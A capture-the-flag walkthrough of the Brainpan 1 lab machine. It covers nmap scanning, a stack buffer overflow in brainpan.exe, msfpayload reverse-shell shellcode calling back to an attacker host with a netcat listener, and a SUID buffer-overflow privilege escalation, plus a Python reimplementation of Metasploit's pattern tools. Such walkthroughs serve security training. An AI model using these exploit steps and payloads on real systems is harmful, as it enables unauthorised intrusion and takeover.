root@osboxes:~# nmap -sn 192.168.1.0/24
Nmap scan report for 192.168.1.110
Host is up (0.00039s latency).
MAC Address: 00:0C:29:10:01:C0 (VMware)
Now let's enumerate the services...
root@osboxes:~# nmap -sV 192.168.1.110
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 20:23 GMT
Nmap scan report for 192.168.1.110
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 00:0C:29:10:01:C0 (VMware)
Let's browse the web application.
Only junk content :-) Now let's turn to dirbuster (as always).
Oh! There may be a binary in the bin directory:
http://192.168.1.110:10000/bin/
I think we should start our 32-bit Windows VM and download brainpan.exe onto it. brainpan.exe is probably the service listening on port 9999 on our target.
I am pretty sure it is a good idea to run brainpan.exe under Immunity Debugger.
Our Windows VM has the IP address 191.168.1.101. We have to click the Start button twice.
My own fuzzer
Result:
The three registers that matter to us on the stack are EAX, EIP and ESP. We have to find where EIP is located in our buffer. We verified that 900 A's cause the overflow and that EIP was overwritten with four A's, so we create a unique pattern:
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 900
and edit our script using the output of the above command. Executing our script, we get the following result:
We can see that EIP has been overwritten with 35724134.
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 35724134
[*] Exact match at offset 524
Great! Now our payload will be as follows: "A"*524 + "B"*4 + (900-524-4)*"C". The updated script gives the following result:
Excellent! Now we know where to place the JMP ESP address and where our shellcode goes.
root@osboxes:/usr/share/metasploit-framework/tools# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
OK! We also found a module without ASLR protection.
!mona find -s "\xff\xe4" -m brainpan.exe
Now we have our JMP ESP address: 311712F3
So our payload will be as follows: "A"*524+"\xf3\x12\x17\x31"+(900-524-4)*"C".
We also have to check for "bad characters", so let's generate all possible byte values.
root@osboxes:~/brainpan1# cat hex.py
# hex.py: print every byte value 00-ff as a "\xNN" escape, in the same
# order as the tail below, so it can be pasted into the exploit's tail
# and checked for bad characters in the debugger
hexdigits = "abcdef0123456789"
for i in hexdigits:
    for j in hexdigits:
        print("\\x" + i + j)
Our temporary payload: "A"*524 + "B"*4 + (900-524-4-int(len(tail)))*"\x90"+tail, where tail is:
\xaa\xab\xac\xad\xae\xaf\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xba\xbb\xbc\xbd\xbe\xbf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xca\xcb\xcc\xcd\xce\xcf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xda\xdb\xdc\xdd\xde\xdf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xea\xeb\xec\xed\xee\xef\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xfa\xfb\xfc\xfd\xfe\xff\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\x0a\x0b\x0c\x0d\x0e\x0f\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x1a\x1b\x1c\x1d\x1e\x1f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x2a\x2b\x2c\x2d\x2e\x2f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x3a\x3b\x3c\x3d\x3e\x3f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x4a\x4b\x4c\x4d\x4e\x4f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x5a\x5b\x5c\x5d\x5e\x5f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x6a\x6b\x6c\x6d\x6e\x6f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x7a\x7b\x7c\x7d\x7e\x7f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x8a\x8b\x8c\x8d\x8e\x8f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x9b\x9c\x9d\x9e\x9f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99
First of all, we should remove \x00 (the null byte, which breaks everything after it) and \x90 (NOP, which does nothing) from our payload.
After sending this payload, we can see in Immunity Debugger that everything is fine (no byte was mangled). Now we generate our shellcode:
root@osboxes:~/brainpan1# msfpayload windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
We have to replace tail with the generated buf, run
root@osboxes:~/brainpan1# nc -nlvp 4444
and execute our script.
Nice! Now we should generate a new payload for our Linux target machine.
root@osboxes:~/brainpan1# msfpayload linux/x86/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
Execute our script and BOOM!
We have got a limited shell!
I checked, and the kernel of our target is not vulnerable to any known exploit :-(, but look at something interesting:
puck@brainpan:/$ find / -perm -4000 -type f
[...]
/usr/sbin/pppd
/usr/local/bin/validate
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
find: `/lost+found': Permission denied
[...]
OK, let's examine /usr/local/bin/validate.
Have you thought about a buffer overflow again? Executing
sudo -l
we see that we don't have any "extra" privileges. I downloaded the validate binary to our machine via netcat.
We can see that there is no result for JMP ESP, but there are two hits for CALL EAX. OK! So we expect that validate is vulnerable to a buffer overflow.
Excellent! We know that 200 A's overflow our binary!
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 200
Amazing! We can determine "where" the EIP register is.
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 39644138
[*] Exact match at offset 116
Our payload will look as in the screenshot below.
Now we can generate shellcode and replace the A's with it. Finally we are able to use our exploit and ... BOOM!
We have escalated our privileges! TRY HARDER!
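To show how pattern_create.rb and pattern_offset.rb arrive at the offsets 524 (brainpan.exe) and 116 (validate) shown above, here is an added example, not code from the original post or from Metasploit, that reimplements the cyclic pattern in Python. It assumes the tool's default character sets (A-Z, a-z, 0-9) and a little-endian x86 target.

```python
import string
import struct

# Same character sets as Metasploit's pattern_create.rb (assumption).
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Build the cyclic pattern: every 3-byte chunk "<Upper><lower><digit>"
    is unique, so any 4-byte window identifies its own position in the
    buffer. Maximum length is 26*26*10*3 = 20280 bytes, as in Metasploit."""
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_hex, length):
    """Take the crash EIP as the debugger shows it (e.g. '35724134'),
    turn it back into the 4 bytes that sat on the stack (little-endian,
    so 0x35724134 -> '4Ar5') and locate them in the pattern.
    Returns -1 when the bytes are not part of the pattern."""
    value = int(eip_hex, 16)
    needle = struct.pack("<I", value).decode("ascii", errors="replace")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # EIP values from the writeup: brainpan.exe (900-byte pattern)
    # and validate (200-byte pattern)
    print(pattern_offset("35724134", 900))  # 524
    print(pattern_offset("39644138", 200))  # 116
```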
Game over!